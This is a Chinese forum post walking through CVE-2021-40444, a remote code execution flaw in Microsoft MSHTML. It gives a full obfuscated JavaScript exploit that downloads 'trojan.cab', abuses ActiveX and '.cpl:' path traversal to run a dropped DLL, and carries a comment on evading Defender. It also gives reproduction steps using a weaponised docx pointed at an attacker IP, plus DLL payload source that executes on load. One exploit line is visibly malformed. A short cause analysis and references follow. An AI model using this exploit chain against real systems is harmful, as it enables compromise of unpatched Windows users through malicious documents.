首页
社区
课程
招聘
[原创]CVE-2021-40444
发表于: 2021-9-21 20:00 11608

[原创]CVE-2021-40444

2021-9-21 20:00
11608

漏洞类型:

Microsoft MSHTML 远程代码执行漏洞

受影响版本:

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems

POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<!DOCTYPE html><font></font>
<html><font></font>
<head><font></font>
<meta http-equiv="Expires" content="-1"><font></font>
<meta http-equiv="X-UA-Compatible" content="IE=11"><font></font>
</head><font></font>
<body><font></font>
<script><font></font>
function(){<font></font>
try{<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}catch(_0x1c747c){<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}<font></font>
iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();<font></font>
try{<font></font>
window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}catch(_0x5afb73){<font></font>
window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],<font></font>
window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));<font></font>
}<font></font>
<font></font>
iframeActxHtml1['open']()['close']();<font></font>
var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');<font></font>
iframeActxHtml2['open']()['close']();<font></font>
iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');<font></font>
iframeActxHtml3['open']()['close']();<font></font>
var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');<font></font>
iframeActxHtml4['open']()['close']();<font></font>
var actx_html_0=new ActiveXObject('htmlfile'),<font></font>
actx_html_1=new ActiveXObject('htmlfile'),<font></font>
actx_html_2=new ActiveXObject('htmlfile'),<font></font>
actx_html_3=new ActiveXObject('htmlfile'),<font></font>
actx_html_4=new ActiveXObject('htmlfile'),<font></font>
actx_html_5=new ActiveXObject('htmlfile'),<font></font>
xmlhttpreq1=new window['XMLHttpRequest'](),<font></font>
window['setTimeout']=window['setTimeout'];//此处可拆分过defender<font></font>
window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/trojan.cab',![]),<font></font>
window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),<font></font>
iframeActxHtml4['Script']['document']['write']('&lt;body>');<font></font>
var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');<font></font>
cabloadunpack['setAttribute']('codebase','http://localhost/trojan.cab#version=5,0,0,0');<font></font>
cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),<font></font>
window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),<font></font>
<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:123',<font></font>
actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/whoiam.inf',<font></font>
actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/whoiam.inf',<font></font>
actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/whoiam.inf',<font></font>
actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../../../../Temp/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../Low/whoiam.inf',<font></font>
actx_html_3['Script']['location']='.cpl:../../whoiam.inf';<font></font>
}();<font></font>
</script><font></font>
</body><font></font>
</html>

解析样本:word_rels\document.xml.rels

图片描述
       可以看到样本附加连接服务器后,执行poc的javascript操作。
       由于相关的ip地址被毙了,已经无法在打开时,直接启动服务器去下载所谓的cab包了。我们直接替换上面的链接。来加载我们的cab包。
图片描述
       正常的inf不具有如此大小,改为txt格式查看。
图片描述
       懂得都懂。熟悉的pe结构,直观的感到是个dll文件。
图片描述
       由于后续操作与我们报的rce操作无关,想触发相应的文件操作,直接改dll文件访问的接口与网址。让其触发是否还有其它的可疑的行为。解析样本告一段落。

复现:

复现分两种,一种直接加载原文件:
图片描述
Note:
IP address: kali ip(in other words,attack ip)
图片描述
将替换好的ip地址的恶意的docx放入被攻击的环境中,双击运行即可。
kali环境中会出现
图片描述

另一种相应的文件全部自己编写:

图片描述
Note:
Why occourred this problem?
图片描述
请尝试使用chmod 777 <allfile>。
或者在windows下作为压缩包解压缩,再解回去,都是可行的。
图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <windows.h>
 
void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
    return;
}
 
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
           exec();
           break;
 
        case DLL_THREAD_ATTACH:
            break;
 
        case DLL_THREAD_DETACH:
            break;
 
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Note:

 

Debian
apt-get install gcc-mingw-w64-i686
Ubuntu
apt-get install gcc-mingw-w64-i686
Kali Linux
apt-get install gcc-mingw-w64-i686
Raspbian
apt-get install gcc-mingw-w64-i686

 

Debian
apt-get install gcc-mingw-w64-x86-64
Ubuntu
apt-get install gcc-mingw-w64-x86-64
Kali Linux
apt-get install gcc-mingw-w64-x86-64
Fedora
dnf install mingw64-gcc
Raspbian
apt-get install gcc-mingw-w64-x86-64

 

生成cab文件。
图片描述

成因:

图片描述
图片描述
依稀可以看到mshtml.dll为我们发光发热。
图片描述
       检索url,跳入releaseInterface函数对象释放后,eip发生了改变,允许利用者远程执行其它代码。

参考文献

https://github.com/lockedbyte/CVE-2021-40444
参照网络安全法第七十六条,该文章仅用于学习和交流。由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用本人负责,文章作者不为此承担任何责任。


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2021-9-21 20:30 被watswyqtwq编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (2)
雪    币: 15170
活跃值: (16832)
能力值: (RANK:730 )
在线值:
发帖
回帖
粉丝
2
建议在成因分析部分详细一些
2021-9-24 16:41
1
雪    币: 958
活跃值: (2098)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
3
大佬,还有什么需要改了
2021-9-26 19:27
0
游客
登录 | 注册 方可回帖
返回
//